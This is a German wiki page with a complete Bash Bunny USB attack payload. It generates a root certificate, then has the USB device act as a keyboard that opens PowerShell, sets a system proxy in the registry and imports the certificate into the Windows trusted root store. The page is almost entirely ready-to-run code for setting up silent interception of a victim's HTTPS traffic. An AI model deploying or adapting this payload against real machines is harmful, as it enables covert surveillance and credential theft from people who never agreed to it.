Root Zertifikat Install
Version vom 23. September 2021, 08:49 Uhr von Mario.zimmermann (Diskussion | Beiträge) (→ImportCert.ps1)
Erstellen des Root Zertifikates
- openssl genrsa -out rootCAKey.pem 2048
- openssl req -x509 -sha256 -new -nodes -key rootCAKey.pem -days 3650 -out cert.pem
- openssl x509 -in cert.pem -text
-----BEGIN CERTIFICATE----- MIIDdTCCAl2gAwIBAgIUZQqjFyRux5NmF2kBbgd4+bHq48EwDQYJKoZIhvcNAQEL BQAwSjELMAkGA1UEBhMCREUxDjAMBgNVBAgMBVNUQVRFMRIwEAYDVQQHDAlOZXkg Sm9lcmsxFzAVBgNVBAoMDlhpbml4IFRlc3QgTERUMB4XDTIxMDkyMzA4MjQ1M1oX DTMxMDkyMTA4MjQ1M1owSjELMAkGA1UEBhMCREUxDjAMBgNVBAgMBVNUQVRFMRIw EAYDVQQHDAlOZXkgSm9lcmsxFzAVBgNVBAoMDlhpbml4IFRlc3QgTERUMIIBIjAN BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0DZkcGlcpYXkdJsq5qwqsafPxtW2 E/DGFP7I/8uAdrpxOlN9kSb6ynOvTrzMeziLta7TKzMS2nmaS4miKO4bwDTWzfdH zj1X0GmS+QHHvSj1rsG63S3TrsoOhNqv2s5No3Q9KPXAE/e1Blxt8f/GbN4Qy5F4 AZ2QSF83VrAyMFi3D0NXWH0B6r1APkGq0FkCqOfnx+gdKmNzhU8B6WPuJcXk3jqS zOJRczRk99zXmipIAaE3sAsupg+jgXW3P4DbYKv4dEGB95TWrm3YOzRslDYnmZ0k 6WZc/XBw0YnAfnl58WBj+/uPAKc2MZOJD2qqYB4IYdvbsUpG2NslDU6dawIDAQAB o1MwUTAdBgNVHQ4EFgQUy87uiv8TASnEcTiiCB+Pe99PfFYwHwYDVR0jBBgwFoAU y87uiv8TASnEcTiiCB+Pe99PfFYwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0B AQsFAAOCAQEAl8V/xsWRuxrw+1XtWkuBkFxvK14JpGSlwQbKkSZIvBDGBDTTugl6 moSJHggcgRPOiocqXnx1pg9hM+VJNv1Tb6NqoZOPm53PhTFVMPHzYKU+nh9GF0zo PvgrOVisG52G9j3zZB4kV1eYMP1i+IZFdaUXcvskqsCSATKj0BGVv6ruh9dwmng6 FM1koJrg8v5/XuxnjG4Uyh7519CM52GODdmJ1sF8IYpDuCQVnqHpGlH/irfkm8Bh 7q3WC4GloI3bndsNQpejbsa0+MozVgDHlPIowdrEeNprrWC7uut1tPsLeFo/uwJr h259XktW/FFLIdwQOc6Tm532L8kvs1yIeQ== -----END CERTIFICATE-----
Code des Payloads
payload.txt
#!/bin/bash # #This payload will enable a proxy and import an SSL certificate to a Windows #computer for Internet Explorer and Chrome (FireFox is in progress for 2.0) #The script uses a combination of Ducky Code and PowerShell. # # Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt # # Red Blinking.............Running Payload # Purple Blinking .........Payload Completed
#Set Red LED to indicate Starting of Script LED R 50
#Set ATTACKMODE to HID and Storage to be able to transfer the certificate ATTACKMODE HID STORAGE
#Import Bunny Helpers source bunny_helpers.sh
#Start of Script Q DELAY 6000 Q GUI r Q DELAY 100 Q STRING POWERSHELL Q ENTER Q DELAY 100
#Change to the directory of the Bunny with the proper switch location Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name Q ENTER Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\' Q ENTER Q STRING cd \$absPath Q ENTER Q DELAY 500
#Set the proxy in the internet settings in the registry (For IE and Chrome). Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=BashBunny').Name+'payloads\\$SWITCH_POSITION \SetProxy.ps1')" Q ENTER Q DELAY 500
#Import the certificate to the computer (for IE and Chrome). Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=BashBunny').Name+'payloads\\$SWITCH_POSITION \ImportCert.ps1')" Q ENTER Q DELAY 1000 Q ALT y Q DELAY 500
#Unmount the USB Drive. Q STRING \$driveEject = New-Object -comObject Shell.Application Q ENTER Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 500 Q ALT t Q DELAY 500 Q STRING EXIT Q ENTER sync LED R B 100
vars.ps1
#Set variables for use in payload. $proxyVal = "proxyip:port" $certName = "cert.pem"
SetProxy.ps1
#Import variables from vars.ps1 for use. . .\vars.ps1
#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it.
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue
if ($ieProcess) {
$ieProcess.CloseMainWindow()
Sleep 5
if (!$ieProcess.HasExited) {
$ieProcess | Stop-Process -Force
}
}
Remove-Variable ieProcess
#Change the proxy settings in the registry $regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" Set-ItemProperty -path $regKey ProxyEnable -value 1 Set-ItemProperty -path $regKey ProxyServer -value $proxyVal
ImportCert.ps1
#Import variables from vars.ps1 for use. . .\vars.ps1 #Add certificate to certificate store $certFile = ( Get-ChildItem -Path $certName ) $certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root